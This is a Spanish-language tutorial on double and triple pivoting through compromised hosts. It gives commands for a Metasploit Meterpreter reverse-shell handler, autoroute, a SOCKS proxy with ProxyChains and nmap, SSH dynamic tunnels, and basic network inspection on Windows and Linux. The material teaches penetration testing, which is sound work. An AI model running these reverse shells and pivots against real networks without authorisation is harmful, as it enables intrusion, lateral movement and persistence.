Doble Pivoting y Triple Pivoting
Doble Pivoting:
Utilizar una máquina comprometida para pivotar a una segunda máquina, y luego usar la segunda máquina para pivotar a una tercera.
Triple Pivoting:
Extender el concepto de doble pivoting para incluir una tercera capa de pivote, lo que permite acceder a una red o sistema adicional a través de múltiples máquinas comprometidas.
Importancia del Pivoting
Acceso a Redes Segregadas: Permite acceder a redes internas que están segregadas del punto de entrada inicial, lo cual es común en entornos empresariales.
Movimiento Lateral: Facilita el movimiento lateral dentro de la red, permitiendo comprometer otros sistemas y servicios.
Persistencia: Ayuda a establecer persistencia en la red, permitiendo al atacante mantener el acceso incluso si se detecta y remedia el punto de entrada inicial.
Configuración de Pivoting en Windows y Linux
La configuración de pivoting puede variar dependiendo del sistema operativo de la máquina comprometida. A continuación se detallan los aspectos teóricos y comandos útiles para configurar pivoting en Windows y Linux.
Pivoting en Windows
En Windows, el pivoting a menudo se realiza utilizando herramientas como Metasploit, Netcat, y PowerShell. La configuración de pivotes en Windows se puede dividir en varias etapas:
1. Establecer una Sesión Meterpreter
Teoría: Meterpreter es un payload avanzado que se utiliza dentro del framework Metasploit para ejecutar comandos en la máquina objetivo.
Comandos:
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST <your_IP> set LPORT <your_port> exploit
2. Configurar un Route
Teoría: La función autoroute de Meterpreter permite agregar rutas a la tabla de enrutamiento, lo que facilita el redireccionamiento del tráfico a través de la máquina comprometida.
Comandos:
meterpreter > run autoroute -s <internal_network>/24
3. Usar Socks Proxy
Teoría: Configurar un proxy SOCKS en Metasploit permite enrutar el tráfico de herramientas de red a través de la máquina comprometida.
Comandos:
use auxiliary/server/socks4a set SRVHOST 0.0.0.0 set SRVPORT 1080 run
4. Configurar ProxyChains
Teoría: ProxyChains se utiliza en la máquina atacante para redirigir el tráfico de herramientas de red a través del proxy SOCKS configurado en Metasploit.
Comandos:
echo "socks4 127.0.0.1 1080" >> /etc/proxychains.conf proxychains nmap -sT -Pn -n -p 80,443 <target_internal_IP>
Pivoting en Linux
En Linux, el pivoting se puede realizar utilizando herramientas como SSH, Netcat, y Metasploit. La configuración de pivotes en Linux también se puede dividir en varias etapas:
1. Establecer un Túnel SSH
Teoría: Un túnel SSH se utiliza para redirigir el tráfico a través de una conexión SSH segura.
Comandos:
ssh -D 1080 -q -C -N user@compromised_host
2. Usar ProxyChains
Teoría: ProxyChains se utiliza en la máquina atacante para redirigir el tráfico de herramientas de red a través del túnel SSH.
Comandos:
echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf proxychains nmap -sT -Pn -n -p 80,443 <target_internal_IP>
3. Configuración de Metasploit
Teoría: Meterpreter y autoroute en Metasploit permiten enrutar el tráfico a través de la máquina comprometida.
Comandos:
use exploit/multi/handler set payload linux/x86/meterpreter/reverse_tcp set LHOST <your_IP> set LPORT <your_port> exploit meterpreter > run autoroute -s <internal_network>/24 use auxiliary/server/socks4a set SRVHOST 0.0.0.0 set SRVPORT 1080 run echo "socks4 127.0.0.1 1080" >> /etc/proxychains.conf proxychains nmap -sT -Pn -n -p 80,443 <target_internal_IP>
Comandos Útiles en Cada Sistema Operativo
Windows
netstat: Ver las conexiones de red.
netstat -an
route: Ver la tabla de enrutamiento.
route print
ipconfig: Ver la configuración de la red.
ipconfig /all
Linux
ifconfig/ip: Ver y configurar la interfaz de red.
ifconfig ip addr show
netstat/ss: Ver las conexiones de red.
netstat -tulnp
route/ip route: Ver la tabla de enrutamiento.
route -n ip route show
iptables: Configurar reglas de firewall.
iptables -L
Última actualización
¿Te fue útil?